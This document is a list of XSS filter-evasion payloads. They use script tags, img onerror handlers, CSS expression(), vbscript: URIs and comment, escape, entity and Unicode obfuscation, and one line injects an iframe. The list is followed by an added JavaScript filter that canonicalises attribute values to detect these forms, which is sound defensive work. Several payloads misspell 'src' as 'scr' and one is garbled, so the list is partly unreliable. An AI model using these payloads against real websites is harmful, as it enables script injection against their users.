<script>alert("跨站")</script> (most commonly used)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (the gap is whitespace produced with the Tab key)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity: <div style={left:&#x0065;xpression (alert('xss'))}></div>
Unicode: <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
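
A defensive counterpart to the list above, as an added example that is not part of the original page: a filter that compares raw attribute text against `expression(` or `javascript:` misses the comment, CSS-escape, HTML-entity, Unicode and Tab forms, so this code canonicalises the value first and matches afterwards. The function names and sample strings are constructed for illustration.

```javascript
// Added example: canonicalise an attribute value before matching it.
// All names and sample strings here are constructed for illustration.
const DANGEROUS = ["expression(", "javascript:", "vbscript:"];

// Code point to string; out-of-range values become U+FFFD instead of throwing.
const cp = (n) => (n <= 0x10ffff ? String.fromCodePoint(n) : "\ufffd");

function decodeHtmlEntities(s) {
  // Numeric character references only: &#x65; and &#101; (';' optional).
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => cp(parseInt(h, 16)))
    .replace(/&#([0-9]+);?/g, (_, d) => cp(parseInt(d, 10)));
}

function decodeCssEscapes(s) {
  // \HHHHHH (1-6 hex digits, one optional trailing space) or \<any char>.
  return s.replace(
    /\\(?:([0-9a-f]{1,6})[ \t\r\n\f]?|(.))/gi,
    (_, hex, ch) => (hex ? cp(parseInt(hex, 16)) : ch)
  );
}

function canonicalise(value) {
  let s = decodeHtmlEntities(value);                 // HTML entity form
  s = s.replace(/\/\*[\s\S]*?\*\//g, "");            // CSS comment form
  s = decodeCssEscapes(s);                           // CSS backslash-escape form
  s = s.normalize("NFKC").toLowerCase();             // full-width letters, mixed case
  return s.replace(/[\s\u0000-\u001f\u007f]+/g, ""); // Tab, space, control chars
}

// Returns the dangerous tokens present after canonicalisation.
function findDangerous(value) {
  const c = canonicalise(value);
  return DANGEROUS.filter((t) => c.includes(t));
}

// Constructed samples modelled on the variants listed on this page.
const samples = [
  "{left:exp/* */ression (alert('xss'))}",
  "{left:\\0065\\0078pression (alert('xss'))}",
  "{left:&#x0065;xpression (alert('xss'))}",
  "{left:exp\uff32essio\uff2e (alert('xss'))}",
  "javas\tcript:alert(1)",
  "left: 10px; color: red",
];
for (const s of samples) console.log(JSON.stringify(s), "->", findDangerous(s));
```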